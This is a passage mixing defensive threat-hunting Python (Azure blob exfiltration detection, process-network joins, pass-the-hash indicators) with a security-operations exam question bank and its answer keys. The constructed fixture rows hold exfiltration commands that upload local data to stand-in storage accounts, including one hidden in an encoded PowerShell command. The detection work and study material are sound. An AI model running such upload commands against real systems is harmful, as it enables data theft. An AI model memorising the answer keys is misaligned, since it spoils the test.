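import base64
import re

# <account>.blob.core.windows.net, with or without scheme; account names are 3-24 lowercase alphanumerics
BLOB_HOST = re.compile(r"(?:https?://)?\b([a-z0-9]{3,24})\.blob\.core\.windows\.net", re.I)
# Az.Storage cmdlets (New-AzStorageContext and friends) name the account as a parameter
ACCOUNT_PARAM = re.compile(r"-StorageAccountName\s+['\"]?([a-z0-9]{3,24})", re.I)
# -e / -enc / -EncodedCommand <base64 of the UTF-16LE script>
ENCODED_CMD = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def storage_accounts_from_cmdline(cmdline):
    """Storage account names referenced by a command line, including inside an encoded command."""
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    names = set()
    for text in texts:
        names.update(n.lower() for n in BLOB_HOST.findall(text))
        names.update(n.lower() for n in ACCOUNT_PARAM.findall(text))
    return names


def find_exfil_targets(process_events, network_events):
    """Merge both sources into {account: {"command_lines", "connections", "devices"}}.
    An account named in a command line and contacted from the same device is the strongest lead."""
    evidence = {}

    def bucket(acct):
        return evidence.setdefault(acct, {"command_lines": 0, "connections": 0, "devices": set()})

    for ev in process_events:
        for acct in storage_accounts_from_cmdline(ev["ProcessCommandLine"]):
            b = bucket(acct)
            b["command_lines"] += 1
            b["devices"].add(ev["DeviceName"])
    for ev in network_events:
        m = BLOB_HOST.search(ev.get("RemoteUrl") or "")
        if m:
            b = bucket(m.group(1).lower())
            b["connections"] += 1
            b["devices"].add(ev["DeviceName"])
    for b in evidence.values():
        b["devices"] = sorted(b["devices"])
    return evidence


def _encode_ps(script):
    """Build a -EncodedCommand value the way PowerShell expects it (used for the sample only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


_SCRIPT = ("$ctx = New-AzStorageContext -StorageAccountName exfilstore01 -SasToken $t; "
           "Set-AzStorageBlobContent -File C:\\dump.zip -Container in -Context $ctx")

PROCESS_EVENTS = [  # constructed DeviceProcessEvents rows
    {"DeviceName": "WS01", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + _encode_ps(_SCRIPT)},
    {"DeviceName": "WS01", "FileName": "azcopy.exe",
     "ProcessCommandLine": "azcopy.exe copy C:\\data https://staging7k.blob.core.windows.net/drop?sv=2022-11-02&sig=REDACTED"},
    {"DeviceName": "WS02", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]
NETWORK_EVENTS = [  # constructed DeviceNetworkEvents rows
    {"DeviceName": "WS01", "InitiatingProcessFileName": "powershell.exe", "RemoteUrl": "exfilstore01.blob.core.windows.net"},
    {"DeviceName": "WS01", "InitiatingProcessFileName": "powershell.exe", "RemoteUrl": "exfilstore01.blob.core.windows.net"},
    {"DeviceName": "WS01", "InitiatingProcessFileName": "powershell.exe", "RemoteUrl": "exfilstore01.blob.core.windows.net"},
    {"DeviceName": "WS01", "InitiatingProcessFileName": "azcopy.exe", "RemoteUrl": "https://staging7k.blob.core.windows.net/drop"},
    {"DeviceName": "WS02", "InitiatingProcessFileName": "onedrive.exe", "RemoteUrl": "odc.officeapps.live.com"},
]

if __name__ == "__main__":
    for acct, ev in find_exfil_targets(PROCESS_EVENTS, NETWORK_EVENTS).items():
        print(acct, ev)
```

The encoded-command decode is the step most hunts miss: a script launched with -EncodedCommand never shows the account name in the raw command line, so a plain string search on ProcessCommandLine returns nothing while the network events still point at the endpoint.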

510
MCQhard

A SOC team uses Microsoft Sentinel with Microsoft Defender XDR integration. An incident is created from a Defender for Endpoint alert. The analyst wants to run a KQL query across all affected devices without creating a new analytics rule. How can the analyst achieve this?

A.Modify the analytics rule that created the incident.
B.Use the incident's Logs blade to run a KQL query.
C.Use the Microsoft Sentinel Hunting blade.
D.Create a new workbook.
AnswerB

Logs blade allows ad-hoc querying within the incident context.

Why this answer

Option B is correct because the Logs blade opened from the incident runs ad-hoc KQL in that incident's context. Option A is wrong because editing the analytics rule changes the scheduled detection rather than running a one-off query. Option C is wrong because the Hunting blade is for proactive hunting across the workspace, not incident-scoped querying.

Option D is wrong because workbooks are for visualisation.

511
Multi-Selecteasy

Your organization uses Microsoft Defender XDR (formerly Microsoft 365 Defender). You need to configure role-based access control (RBAC) for the security team. Which TWO built-in roles can be assigned in Microsoft 365 Defender to manage incidents and alerts?

Select 2 answers
A.Global Administrator
B.Compliance Administrator
C.Security Operator
D.Security Administrator
E.Security Reader
AnswersC, D

Security Operators can view and respond to incidents and alerts.

Why this answer

Options C and D are correct: Security Operator and Security Administrator can both view and manage incidents and alerts in the Microsoft Defender portal. Option E is wrong because Security Reader is read-only. Option B is wrong because Compliance Administrator manages compliance features, not security incidents.

Option A is wrong because Global Administrator can do it but is far too broad to assign for this purpose; least privilege points to the security-specific roles.

512
MCQeasy

A company wants to continuously assess the compliance of their Azure resources against the CIS (Center for Internet Security) benchmark. Which Microsoft Defender for Cloud feature should they use?

A.Regulatory compliance dashboard
B.Secure score
C.Azure Policy
D.Workload protections
AnswerA

This dashboard allows you to track compliance against built-in standards like CIS, and you can assign the CIS initiative to your subscriptions.

Why this answer

The Regulatory compliance dashboard in Microsoft Defender for Cloud provides pre-built assessments and continuous monitoring against specific compliance standards, including the CIS benchmark. It automatically evaluates Azure resources against CIS controls and displays compliance status, making it the correct feature for this requirement.

Exam trap

The trap here is that candidates often confuse Secure score (which measures overall security hygiene) with the Regulatory compliance dashboard (which measures adherence to specific standards like CIS), leading them to select Secure score when the question explicitly asks for compliance against a benchmark.

How to eliminate wrong answers

Option B is wrong because Secure score measures overall security posture based on implemented security controls, not specific compliance with a regulatory standard like CIS. Option C is wrong because Azure Policy is a service for creating, assigning, and managing policies that enforce rules on resources, but it does not natively include pre-built CIS benchmark assessments; the Regulatory compliance dashboard leverages Azure Policy initiatives but provides the compliance-specific dashboard. Option D is wrong because Workload protections refer to advanced threat detection capabilities for workloads (e.g., servers, databases), not compliance assessment against benchmarks like CIS.

513
Multi-Selecthard

Which THREE elements are required to create a custom detection rule in Microsoft Sentinel?

Select 3 answers
A.An alert threshold
B.A KQL query
C.Entity mapping for incident creation
D.An automation playbook
E.A schedule for the query
AnswersB, C, E

The query defines the detection logic.

Why this answer

In Sentinel this is a scheduled analytics rule: it needs a KQL query for the detection logic, a schedule (run frequency and lookback period) and entity mapping so that the results carry accounts, hosts and IP addresses into the incident. An alert threshold is optional; a playbook is attached separately through an automation rule.

514
MCQhard

An administrator creates a Microsoft Defender for Cloud Apps policy to block unsanctioned cloud storage apps. Despite the policy, users can still access these apps. What is the most likely cause?

A.The action type 'Block' is incorrect; it should be 'Alert'
B.The policy requires a 'Device' filter to apply to all users
C.The filter uses 'Unsanctioned' tag, but apps are tagged 'Sanctioned'
D.The policy mode is set to 'Monitor', which only alerts and does not block
AnswerD

Monitor mode doesn't enforce actions; it must be set to 'Block' or 'Govern'.

Why this answer

The policy mode is set to 'Monitor' instead of 'Govern' or 'Block'. In Microsoft Defender for Cloud Apps, policies in 'Monitor' mode only generate alerts, not block. The action 'Block' is defined but the policy mode must be set to 'Block' or 'Govern' to enforce.

The filter and actions are correct.

515
MCQmedium

Refer to the exhibit. You have a KQL query in a Microsoft Sentinel analytics rule. The rule is not generating incidents even though there are 'Suspicious sign-in' alerts from non-contoso.com users. What is the most likely issue?

A.The 'extend' line is incorrectly parsing the entity.
B.The query is querying the wrong table. 'Suspicious sign-in' alerts may be in a different table.
C.The 'where' clause using !endswith is incorrect.
D.The query does not filter by AlertName correctly.
AnswerB

Sign-in alerts are often in SigninLogs or other tables.

Why this answer

Option B is correct because the query is likely reading from the wrong table. In Microsoft Sentinel, alerts raised by Microsoft Entra ID Protection and by the Defender products are ingested into the SecurityAlert table; a query against a table named 'Alert', or against raw SigninLogs looking for an alert name, returns nothing, so the rule never fires and no incident is created. The rule's query must reference the table that actually holds these alerts.

Exam trap

The trap here is that candidates assume all security data lives in one table. Sentinel keeps product alerts in SecurityAlert and raw sign-in events in SigninLogs, while Defender XDR advanced hunting keeps alert data in AlertInfo and AlertEvidence; the exam tests whether you know which table holds the data a rule is looking for.

How to eliminate wrong answers

Option A is wrong because an 'extend' line adds or transforms columns; the rule's entity mapping section then binds those columns to entities, so a faulty extend would degrade entity quality, not stop rows from being returned at all. Option C is wrong because '!endswith' is the right operator for keeping only user principal names that do not end in 'contoso.com', which is what the rule intends; the logic is valid provided the column holds the full UPN. Option D is wrong because the rule fires whenever the query returns rows; a narrower AlertName filter would only reduce matches, and cannot explain why a table holding the right alerts returns none.

516
MCQmedium

You are reviewing an alert rule in Microsoft Sentinel created via ARM template. What is the primary purpose of this rule?

A.To send an alert when a sign-in with high risk level is detected.
B.To isolate the user's device from the network.
C.To automatically block the user from signing in.
D.To create an incident in Microsoft Sentinel.
AnswerA

The rule triggers on high risk sign-ins and sends an alert via the action group.

Why this answer

Option A is correct because the rule's condition is a sign-in with a high risk level and its action is to notify an action group. Option B is wrong because the rule does not isolate devices. Option C is wrong because it does not block the user.

Option D is wrong because the rule raises an alert through the action group; it does not create a Sentinel incident directly.

517
Multi-Selectmedium

Which TWO tools in Microsoft Defender XDR provide automated investigation and response capabilities?

Select 2 answers
A.Microsoft Defender for Endpoint
B.Microsoft Defender for Office 365
C.Microsoft Defender for Identity
D.Microsoft Defender for Cloud Apps
E.Microsoft Defender for Cloud
AnswersA, B

Defender for Endpoint includes AIR for endpoint incidents.

Why this answer

Automated investigation and response (AIR) is available in Defender for Office 365 and Defender for Endpoint. Defender for Identity and Defender for Cloud Apps have some automation but not full AIR. Defender for Cloud is separate.

518
MCQmedium

Your Microsoft Sentinel workspace is ingesting logs from multiple sources. You notice that the data ingestion cost is higher than expected. You want to reduce costs without losing security value. Which action should you take?

A.Reduce the retention period for all data to 30 days.
B.Switch the pricing tier from Capacity Reservations to Pay-as-you-go.
C.Disable analytics rules that generate high volume of alerts.
D.Configure basic logs ingestion for verbose data sources such as firewall logs.
AnswerD

Basic logs are cheaper and still searchable for incident response.

Why this answer

Option D is correct because moving high-volume, low-value sources such as firewall logs to the basic logs plan cuts ingestion cost while keeping the data searchable for investigations. Option A is wrong because cutting retention for every table risks losing data you still need for investigations and compliance. Option C is wrong because disabling analytics rules reduces detection coverage, and rules do not drive ingestion cost in any case.

Option B is wrong because a commitment tier is cheaper per GB than pay-as-you-go at high volume, so switching would raise cost. The check to make before moving a table: basic logs cannot be used in analytics rules and support only a subset of KQL, so the plan is only suitable for data you search during an investigation, not data that real-time detections depend on.

519
Multi-Selecthard

An analyst writes an advanced hunting query to investigate a suspicious executable that initiated outbound connections. Which two Microsoft 365 Defender tables are most relevant? (Choose 2.)

Select 2 answers
A.DeviceProcessEvents.
B.DeviceNetworkEvents.
C.EmailAttachmentInfo.
D.IdentityInfo.
AnswersA, B

This table contains process creation and command-line details.

Why this answer

DeviceProcessEvents is correct because it records process creation events, including the executable that initiated the outbound connection. By querying this table, you can identify the suspicious executable's name, command line, and parent process, which is essential for tracing the origin of the malicious activity.

Exam trap

The trap here is that candidates may mistakenly choose EmailAttachmentInfo thinking the executable arrived via email, but the question focuses on the executable's outbound connections, not its delivery method.

520
MCQhard

An organization uses Microsoft Sentinel with the Microsoft Defender XDR connector. An incident is generated for a user who is suspected of being compromised. The analyst wants to automatically block the user's sign-ins using a playbook. Which connector should the playbook use?

A.Microsoft Sentinel connector
B.Microsoft 365 Defender connector
C.Microsoft Entra ID connector
D.Microsoft Teams connector
AnswerC

The Microsoft Entra ID connector (Azure AD) can perform actions such as blocking user sign-ins or revoking sessions.

Why this answer

Microsoft Entra ID (Azure AD) connector allows updating user risk or disabling account. Microsoft 365 Defender is for alerts; Teams is for notifications; Sentinel connector is for ingestion.

521
MCQhard

Your organization uses Microsoft Defender XDR. You need to configure a custom detection rule that runs every hour and alerts when a specific process is executed on multiple devices within 10 minutes. Which type of rule should you create?

A.Hunting query saved as a detection
B.Behavioral rule
C.Custom detection rule
D.Advanced hunting query
AnswerC

Custom detection rules support scheduled queries with time-based aggregations.

Why this answer

Custom detection rules in Microsoft Defender XDR are scheduled advanced hunting queries (run at frequencies such as every hour) that raise alerts and take response actions on matches, and the query can aggregate across devices within a time window, so option C is correct. Option A is wrong because a saved hunting query is just a query; it becomes a detection only when turned into a custom detection rule.

Option D is wrong because advanced hunting is the query interface, not a rule type. Option B is wrong because 'behavioral rule' is not a Defender XDR rule type for scheduled queries.
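The two hunting patterns behind questions 519 and 521, as one added example that is not part of the question bank: joining a suspicious executable's process creations to the outbound connections it opened (DeviceProcessEvents to DeviceNetworkEvents), and the custom-detection aggregation of one file hash launched on several devices inside a 10-minute window. Column names follow the real tables; the rows, device identifiers, hashes and threshold are constructed.

```python
"""Two advanced-hunting patterns over constructed DeviceProcessEvents / DeviceNetworkEvents rows.

Added example; not code from the question bank. Column names follow the real
tables (DeviceId, ProcessId, InitiatingProcessId, SHA256, RemoteIP, Timestamp);
the rows are made up.
  1. join the outbound connections of a suspicious executable back to the exact
     process instance that opened them;
  2. the custom-detection aggregation: one file hash launched on at least N
     distinct devices within a 10-minute window.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def join_process_to_network(process_events, network_events):
    """DeviceNetworkEvents.InitiatingProcessId is the ProcessId of the
    DeviceProcessEvents row that created the process, so (DeviceId, ProcessId)
    is the join key. A connection stamped before the creation belongs to an
    earlier process that reused the PID and is dropped."""
    by_key = {(p["DeviceId"], p["ProcessId"]): p for p in process_events}
    joined = []
    for n in network_events:
        p = by_key.get((n["DeviceId"], n["InitiatingProcessId"]))
        if p is None or n["Timestamp"] < p["Timestamp"]:
            continue
        joined.append({"DeviceId": n["DeviceId"], "FileName": p["FileName"], "SHA256": p["SHA256"],
                       "ProcessCommandLine": p["ProcessCommandLine"], "RemoteIP": n["RemoteIP"],
                       "RemotePort": n["RemotePort"], "Timestamp": n["Timestamp"]})
    return joined


def devices_per_hash_in_window(process_events, min_devices=3, window=timedelta(minutes=10)):
    """{SHA256: evidence} for hashes executed on >= min_devices distinct devices
    inside any span of `window`. This is the logic a custom detection rule would
    run every hour over its lookback period."""
    per_hash = defaultdict(list)
    for p in process_events:
        per_hash[p["SHA256"]].append((p["Timestamp"], p["DeviceId"]))
    hits = {}
    for sha, rows in per_hash.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):          # sliding window over launches of this hash
            while rows[end][0] - rows[start][0] > window:
                start += 1
            devices = {d for _, d in rows[start:end + 1]}
            if len(devices) >= min_devices:
                hits[sha] = {"devices": sorted(devices), "first_seen": rows[start][0], "last_seen": rows[end][0]}
                break
    return hits


T0 = datetime(2024, 3, 4, 10, 0)


def _proc(minute, device, pid, name, sha, cmd):
    return {"Timestamp": T0 + timedelta(minutes=minute), "DeviceId": device, "ProcessId": pid,
            "FileName": name, "SHA256": sha, "ProcessCommandLine": cmd}


def _net(minute, device, pid, ip, port=443):
    return {"Timestamp": T0 + timedelta(minutes=minute), "DeviceId": device, "InitiatingProcessId": pid,
            "RemoteIP": ip, "RemotePort": port}


PROCESS_EVENTS = (
    # the same unknown binary lands on three devices within seven minutes, a fourth much later
    [_proc(0, "WS01", 4120, "updatesvc.exe", "sha256-evil", "updatesvc.exe -s"),
     _proc(3, "WS02", 5552, "updatesvc.exe", "sha256-evil", "updatesvc.exe -s"),
     _proc(7, "WS03", 7001, "updatesvc.exe", "sha256-evil", "updatesvc.exe -s"),
     _proc(40, "WS04", 3300, "updatesvc.exe", "sha256-evil", "updatesvc.exe -s")]
    # a legitimate installer running on five devices an hour apart must not fire
    + [_proc(60 * i, f"WS0{i + 1}", 1001 + i, "msiexec.exe", "sha256-benign", "msiexec.exe /i app.msi /qn")
       for i in range(5)]
)
NETWORK_EVENTS = [
    _net(0.5, "WS01", 4120, "203.0.113.10"),     # joins to the WS01 creation
    _net(3.3, "WS02", 5552, "203.0.113.10"),     # joins to the WS02 creation
    _net(8, "WS03", 9999, "203.0.113.10"),       # no creation row for this PID: dropped
    _net(-1, "WS01", 4120, "198.51.100.7"),      # earlier process that had PID 4120: dropped
]

if __name__ == "__main__":
    print(devices_per_hash_in_window(PROCESS_EVENTS))
    for row in join_process_to_network(PROCESS_EVENTS, NETWORK_EVENTS):
        print(row["DeviceId"], row["FileName"], row["RemoteIP"])
```

The timestamp check in the join is the part worth keeping when you write the KQL: joining on DeviceId and process id alone will happily attach connections from a different process that happened to get the same PID earlier in the lookback window.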

522
MCQmedium

A company uses Microsoft Defender for Cloud to manage security across multiple Azure subscriptions. They want to automatically remediate non-compliant resources when a policy violation is detected—for example, enabling encryption on a storage account that has it disabled. Which feature should they configure?

A.Regulatory compliance dashboard
B.Azure Policy's DeployIfNotExists effect
C.Adaptive network hardening
D.Just-In-Time VM access
AnswerB

DeployIfNotExists policies automatically deploy the required configuration (e.g., enable encryption) when a non-compliant resource is created or updated.

Why this answer

Azure Policy's DeployIfNotExists effect is the correct feature because it automatically deploys a resource configuration (such as enabling encryption on a storage account) when a policy evaluation detects non-compliance. This effect runs during policy evaluation and remediation tasks, ensuring that the resource is brought into compliance without manual intervention. It is specifically designed for automated remediation of non-compliant resources in Azure, aligning with the requirement to fix violations like missing encryption.

Exam trap

The trap here is that candidates may confuse the Regulatory compliance dashboard (a monitoring tool) with an automated remediation feature, overlooking that Azure Policy's DeployIfNotExists effect is the actual mechanism for enforcing and fixing compliance violations.

How to eliminate wrong answers

Option A is wrong because the Regulatory compliance dashboard is a reporting and monitoring tool that displays compliance status against standards (e.g., CIS, NIST), but it does not perform automated remediation of non-compliant resources. Option C is wrong because Adaptive network hardening provides recommendations to tighten network security group rules based on traffic patterns, not automated remediation of policy violations like encryption settings. Option D is wrong because Just-In-Time VM access reduces attack surface by controlling inbound traffic to VMs on demand, but it does not address policy compliance or resource configuration remediation.

523
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. You need to ensure that security alerts from Defender for Cloud are automatically ingested into Sentinel. What should you configure?

A.Enable diagnostic settings on the Defender for Cloud subscription.
B.Configure the 'Azure Activity' data connector.
C.Create an automation rule in Sentinel to fetch alerts from Defender for Cloud.
D.Add the 'Microsoft Defender for Cloud' data connector in Microsoft Sentinel.
AnswerD

The data connector ingests security alerts from Defender for Cloud.

Why this answer

Option D is correct because Sentinel has a data connector specifically for ingesting Defender for Cloud security alerts. Option A is wrong because diagnostic settings export resource logs, not Defender for Cloud alerts.

Option B is wrong because the Azure Activity connector brings in the subscription activity log, not alerts. Option C is wrong because automation rules act on incidents that already exist; they do not ingest anything.

524
Multi-Selecthard

Which THREE of the following are indicators of a potential pass-the-hash attack that a threat hunter should investigate in Microsoft Defender for Identity?

Select 3 answers
A.High volume of TGS requests from a single user
B.Multiple failed logon attempts followed by a successful logon from the same IP
C.Anomalous NTLM authentication from a domain controller
D.Event ID 4624 with LogonType 9 (NewCredentials) from a non-privileged account
E.Anomalous spike in CPU usage on domain controllers
AnswersB, C, D

This pattern suggests credential cracking or pass-the-hash.

Why this answer

Options B, C and D are correct. Anomalous NTLM authentication from a domain controller is suspicious because a DC does not normally initiate NTLM logons to other hosts, and pass-the-hash relies on NTLM. A run of failed logons followed by a success from the same IP indicates credential guessing or reuse.

Event ID 4624 with logon type 9 (NewCredentials) is what mimikatz-style pass-the-hash produces: a token is created with alternate credentials and the logon process name is 'seclogo'. Option A is incorrect because a burst of TGS requests is a Kerberoasting indicator, not pass-the-hash. Option E is incorrect because CPU spikes are not specific to any credential attack. One caveat: 'runas /netonly' generates the same logon type 9 event legitimately, so check the account and the parent process before treating it as confirmed.
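The three indicators above as detection logic over constructed Windows Security events, an added example that is not part of the question bank. The rows mimic the Sentinel SecurityEvent columns for 4624 and 4625 (LogonType, LogonProcessName, AuthenticationPackageName, IpAddress, TargetUserName); the domain controller address list, accounts and thresholds are assumptions.

```python
"""Pass-the-hash indicators over constructed Windows Security events.

Added example; not code from the question bank. Rows mimic the Sentinel
SecurityEvent columns for 4624 (logon) and 4625 (failed logon). The DC address
list is an assumption you would take from your own inventory.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def hunt_pass_the_hash(events, dc_ips, fail_threshold=5, window=timedelta(minutes=10)):
    """Return findings for three indicators:
    newcredentials_logon  4624 / LogonType 9 with logon process 'seclogo', the
                          footprint of mimikatz sekurlsa::pth (and of runas /netonly)
    ntlm_from_dc          NTLM logon whose source is a domain controller, which
                          should be authenticating with Kerberos, not NTLM
    fail_then_success     >= fail_threshold 4625s from one IP followed by a 4624
                          from the same IP inside `window`"""
    findings = []
    failures = defaultdict(list)                    # source IP -> failure timestamps
    for ev in sorted(events, key=lambda e: e["TimeGenerated"]):
        if ev["EventID"] == 4625:
            failures[ev["IpAddress"]].append(ev["TimeGenerated"])
            continue
        if ev["EventID"] != 4624:
            continue
        base = {"time": ev["TimeGenerated"], "account": ev["TargetUserName"], "source_ip": ev["IpAddress"]}
        if ev["LogonType"] == 9 and ev["LogonProcessName"].lower() == "seclogo":
            findings.append({"indicator": "newcredentials_logon", **base})
        if ev["AuthenticationPackageName"].upper() == "NTLM" and ev["IpAddress"] in dc_ips:
            findings.append({"indicator": "ntlm_from_dc", **base})
        recent = [t for t in failures.get(ev["IpAddress"], []) if ev["TimeGenerated"] - t <= window]
        if len(recent) >= fail_threshold:
            findings.append({"indicator": "fail_then_success", "failed_attempts": len(recent), **base})
            failures[ev["IpAddress"]].clear()       # one finding per burst
    return findings


T0 = datetime(2024, 5, 6, 8, 0)


def _logon(minute, event_id, user, ip, logon_type=3, package="Kerberos", process="Kerberos"):
    return {"TimeGenerated": T0 + timedelta(minutes=minute), "EventID": event_id, "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type, "AuthenticationPackageName": package,
            "LogonProcessName": process}


DC_IPS = {"10.0.0.5", "10.0.0.6"}
SAMPLE_EVENTS = (
    [_logon(0, 4624, "jdoe", "-", logon_type=9, package="Negotiate", process="seclogo"),   # pth footprint
     _logon(1, 4624, "jdoe", "-", logon_type=2, package="Negotiate", process="User32"),    # normal console logon
     _logon(2, 4624, "DC01$", "10.0.0.5", package="NTLM", process="NtLmSsp"),             # DC speaking NTLM
     _logon(3, 4624, "DC01$", "10.0.0.5")]                                                # DC using Kerberos: fine
    # six failures then a success from one workstation
    + [_logon(10 + i, 4625, "svc_backup", "10.0.0.77", package="NTLM", process="NtLmSsp") for i in range(6)]
    + [_logon(16, 4624, "svc_backup", "10.0.0.77", package="NTLM", process="NtLmSsp")]
    # two failures then a success: below threshold
    + [_logon(20, 4625, "asmith", "10.0.0.88"), _logon(21, 4625, "asmith", "10.0.0.88"),
       _logon(22, 4624, "asmith", "10.0.0.88")]
)

if __name__ == "__main__":
    for f in hunt_pass_the_hash(SAMPLE_EVENTS, DC_IPS):
        print(f["indicator"], f["account"], f["source_ip"])
```

The newcredentials check deliberately keys on the logon process name as well as the logon type; logon type 9 on its own is noisy on administrator workstations where runas /netonly is routine, so the finding is a lead to triage against the parent process, not an alert to page on.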

525
Multi-Selectmedium

Which TWO tables in Microsoft Defender XDR advanced hunting provide information about user authentication events?

Select 2 answers
A.AlertInfo
B.AADSignInEventsBeta
C.EmailEvents
D.IdentityLogonEvents
E.DeviceNetworkEvents
AnswersB, D

Contains Azure AD sign-in events.

Why this answer

Options B and D are correct. AADSignInEventsBeta holds Microsoft Entra ID (Azure AD) sign-in events, and IdentityLogonEvents holds on-premises Active Directory authentications reported by Defender for Identity together with cloud sign-ins seen by Defender for Cloud Apps.

E is incorrect because DeviceNetworkEvents is network telemetry. C is incorrect because EmailEvents is email. A is incorrect because AlertInfo holds alerts.
